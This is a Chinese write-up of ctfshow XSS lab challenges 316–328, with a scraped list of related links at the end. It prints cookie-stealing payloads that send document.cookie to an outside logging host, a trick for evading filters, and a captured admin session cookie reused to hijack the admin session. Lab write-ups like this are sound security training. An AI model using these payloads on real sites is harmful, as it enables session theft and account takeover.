ctfshow XSS漏洞web316-328
XSS漏洞
漏洞简介:
XSS(Cross Site Scripting)意为跨站脚本攻击。为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。XSS漏洞是-种在Web应用中常见的安全漏洞,它允许用户将恶意代码植人Web页面,当其他用户访问此页面时,植人的恶意代码就会在其他用户的客户端中执行。
XSS漏洞的危害很多,可以通过XSS漏洞获取客户端用户的信息(例如用户登录的Cookie信息),可以通过XSS蠕虫进行信息传播,可以在客户端中植人木马,可以结合其他漏洞攻击服务器,在服务器中植人木马等。
XSS漏洞分类
XSS漏洞分为反射型XSS漏洞、存储型XSS漏洞和DOM型XSS漏洞3类
2022/4/7
反射性XSS
Web316
圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋!
CEYE - Monitor service for security testing
先在这个网站注册一个账号获得一个临时的域名
红框内的是临时的域名
然后在方框中输入:
<script>
var img=document.createElement("img"); img.src="http://你的ceye地址/"+document.cookie;
</script>
var img11=document.createElement("img");是生成一个img对象,然后 img11.src="http://你的ceye地址/"+document.cookie;,是加载加载一张图片加上当前的cookie这里我们填写的是接收平台的地址,所以会带上document.cookie去加载地址然后平台会有记录cookie的值ctf平台会有个虚拟机器人,充当admin的身份,每个一段时间点开网站它一点开就会加载payload,发送它自身的cookie在那个框内输入那个标签输进去,网站一加载就执行了我们输入的xss代码然后他自己会发送cookie
就会有flag
还有别的方法:
1.window.open:
<script>window.open('http://你的ceye地址/'+document.cookie)</script>
2.input
<input onfocus="window.open('http://你的ceye地址/'+document.cookie)" autofocus>
3.svg
<svg onload="window.open('http://你的ceye地址/'+document.cookie)">
3.iframe
<iframe onload="window.open('http://你的ceye地址/'+document.cookie)"></iframe>
4.body(后面用的都是这个!!)
<body onload="window.open('http://你的ceye地址/'+document.cookie)">
2022/4/10
Web317
反射性XSS 带过滤
先试一下web316的答案可不可行
结果没有反应。可能是过滤了<script>
我们用<body>试下
<body onload="window.open('http://你的ceye地址/'+document.cookie)">
注意要把网址改为你的ceye地址不要直接粘贴
成功了!
然后上自己的ceye网站查看flag
flag:
ctfshow{7ab994e4-19dd-410f-a619-9585a4f97843}
Web318
也是这个方法
然后我们再网站上查看flag
|
web319
同上方法
得到flag
ctfshow{95389d61-a4cd-4cfa-aba2-6187ee220783}
web320
试用了一下前面的<body>方法发现没有反应,然后发现这道题过滤了空格
一般空格被过滤有如下替换方法
1./**/
2./
这道题目我们用/**/试试
<body/**/onload="window.open('http://h9izlh.ceye.io/'+document.cookie)">
ctfshow{6d3fa3bf-2ee9-40bc-86b6-916dde5193d8}
web321
同上(同320)
ctfshow{6355bec1-2b90-49c5-a2ef-0fd18e71c0f5}
后面的方法也都同上
存储型XSS
web327
发件人填:admin
然后新的内容继续用我们的的body标签
<body onload="window.open('http://你的ceye地址/'+document.cookie)">
回到我们的ceye网站
得到flag
ctfshow{96721deb-033e-4d73-91b9-11370ada01d2}
Web328
随便注册一个用户名
密码为:
<script>window.open('http://你的ceye地址/'+document.cookie)</script>
用script标签(body好像不太行)
然后我们就可以得到管理员的Cookie
管理员Cookie为
88f8e03853ojfg3qrlfl1a4h3p
然后我们点击用户管理我们是什么都看不到的
然后按F12把这个页面的Cookie改成管理员的
然后就有了flag
ctfshow XSS漏洞web316-328相关推荐
- xss跳转代码_从某cms的xss漏洞来学习代码审计
原创: xiaoyuer 合天智汇 各位大佬好,小弟的文章主要是通过针对具体的cms(内容管理系统)对一些基本的web漏洞进行挖掘和代码审计,这样学习起来能够理解的更加深刻.如有写的不对的地方请轻拍. ...
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...
- Flash XSS 漏洞详解 根治的好办法
本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞,并提出比较有效的解决方案. 首先,我们看看什么情况下,会出现XSS. 第一种情况: 把flashvars传入的参 ...
- XSS漏洞自动化攻击工具XSSer
XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击 ...
- php的服务器变量$SERVER以及防止$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
一.背景 突然想起来之前面试的一些面试题,让我写出几个服务器变量$SERVER代表的意思..实话实说,这些东西已经忘记很久了,都是用的时候直接上网查,今天再复习复习吧. 二.$SERVER $_SER ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- Web安全之XSS漏洞
同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...
- 蜜罐中利用jsonp跨域漏洞和xss漏洞的分析
一.前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些"主动防御"的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析. 二.蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击 ...
- 【网络安全】如何使用ppmap检测和利用XSS漏洞
关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...
最新文章
- 网页版的svn怎样同步代码_学会使用Hdlbits网页版Verilog代码仿真验证平台
- 汇编比较两个数大小_计算机是怎样跑起来的 -- 体验一次汇编过程
- 自称比特币创造者中本聪,如今这人被法官怒怼作伪证!
- centos 网络开启
- Caffe学习2:Blob
- C++中struct和class的区别 [zz]
- 转:《欢聚时代(多玩YY)IPO招股书》(概要)
- bzoj 3237: [Ahoi2013]连通图 并查集+线段树分治
- 计算机专业毕业设计题目哪个简单,计算机专业毕业设计题目计算机专业毕业设计的类型...
- 大学计算机构成课程论文,大学计算机课程论文
- DX11 游戏开发笔记 (一) 资源介绍
- 联想Y400 拆光驱加装固态硬盘
- ubuntu下安装wps出现系统缺失字体问题?
- Java程序设计课程教学实践
- 诺基亚的最后机会:没落贵族能否抗衡苹果安卓
- 重磅推荐:一个也许能骗到黑客的系统
- 硬件工程师专业术语解释
- win32中如何区别“鼠标单击”和 “鼠标双击”
- 离散数学复习资料和试题
- 2013年7月22日 匆匆